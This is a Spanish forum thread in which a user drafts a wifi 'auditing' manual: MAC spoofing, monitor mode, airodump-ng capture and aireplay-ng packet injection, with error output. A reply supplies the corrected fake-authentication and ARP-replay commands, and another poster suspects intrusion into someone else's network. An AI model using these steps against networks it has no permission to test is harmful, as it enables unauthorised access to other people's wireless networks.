Seguridad Wireless - Wifi
Sistemas operativos => Zona GNU/Linux => Mensaje iniciado por: eliseo007 en 16-09-2008, 03:55 (Martes)
-
Hola a todos
he estado haciendo un manual para aprender a Auditar redes
esto es lo que llevo:
***Manual para Auditar redes wifi***
Fecha: 15 Sept 2008
Sistema Operativo: Ubuntu 8.04
Paso 1:
Abrir Terminal
// Veremos que tarjeta usaremos buscamos nuestra tarjeta USB
~$ sudo iwconfig
[sudo] password for eliseo007: //Ingresa contraseña
lo no wireless extensions.
eth1 IEEE 802.11b/g ESSID:off/any Nickname:"zd1211"
Mode:Managed Frequency:2.472 GHz Access Point: Invalid
Encryption key:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
eth0 no wireless extensions.
wmaster0 no wireless extensions.
wlan0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2346 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
/* Usaremos eth1 que es nuestra tarjeta Air802 USB */
---
Paso 2:
// Cambiemos la MAC de nuestra maquina
~$ sudo ifconfig eth1 down
~$ sudo macchanger -m 00:11:22:33:44:55 eth1
Current MAC: 00:18:52:43:47:56 (Cimsys Inc)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
It's the same MAC!!
~$ sudo ifconfig eth1 up
---
Paso 3:
// Colocar en modo monitor la tarjeta.
~$ sudo iwconfig eth1 mode monitor
---
Paso 4:
// Empezar a capturar caquetes con airodump-ng
~$ sudo airodump-ng --write capturas eth1
---
Paso 5:
Abrir nueva terminal
//Empezar a capturar trafico con airodump-ng
~$ sudo airodump-ng -w (nombre red) -c (canal ej:8) eth1
---
Paso 6:
Abrir nuevo terminal
//Para inyectar trafico
es en este paso y asia adelante que nu me resulta
segun un manual que me pasaron me sale lo siguiente:
errores:
~$ sudo aireplay-ng --arpreplay -h 00:17:9A:0C:03:6D -h 00:11:22:33:44:55 eth1
21:36:26 Please specify at least a BSSID (-b) or an ESSID (-e)
~$ sudo aireplay-ng -3 -e 00:17:9A:0C:03:6D -h 00:11:22:33:44:55 eth1
21:37:34 Waiting for beacon frame (ESSID: 00:17:9A:0C:03:6D)
21:37:34 No such BSSID available.
Please specify a BSSID (-a).
~$ sudo aireplay-ng -8 -b ESSIDdeRED -h 00:11:22:33:44:55 eth1
aireplay-ng: invalid option -- 8
"aireplay-ng --help" for help.
~$ sudo aireplay-ng -1 0 -e ESSIOdeRED -a 00:17:9A:0C:03:6D -h 00:11:22:33:44:55 eth1
21:42:08 Waiting for beacon frame (BSSID: 00:17:9A:0C:03:6D)
21:42:08 Sending Authentication Request
Que estoy haciendo mal?
me pueden ayudar x favor?
Desde ya muchas gracias
-
k estoy haciendo mal?
-
Buenas.
Supongo que quieres realizar un ataque sin clientes conectados, por lo que tienes que generar un cliente falso (-1) y reinrectar (-3).
O sea:
sudo aireplay-ng -1 0 -e ESSIOdeRED -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth1
sudo aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth1
¿Te has fijado en los mensajes que te da?
21:37:34 Waiting for beacon frame (ESSID: 00:17:9A:0C:03:6D)
21:37:34 No such BSSID available.
Please specify a BSSID (-a).
.
no hay ningun ESSID con ese nombre, ya que lo que pones es el BSSID. Creo que es la opción -b, pero prueba con la -a.
aireplay-ng: invalid option -- 8
"aireplay-ng --help" for help.
No existe el ataque 8 :P
Lo del --arpreplay no lo he usado nunca, pero con los 2 comandos anteriores es suficiente.
PD. Borra las MACs que has puesto, aunque supongo que serán de ejemplo.
Saludos ;)
-
para que haces un manual si dices que ya tienes uno ....
no es por ser malo pero si no sabes muchos (como yo) y haces un manual confundiras a los demas si no lo sabes hacer bien ademas aqui hay muchos manuales solo hay que buscar
me parece que quieres meterte a una red ajena :-\
bueno esa es mi opinion, pero puedo estar equivocado
saludos :D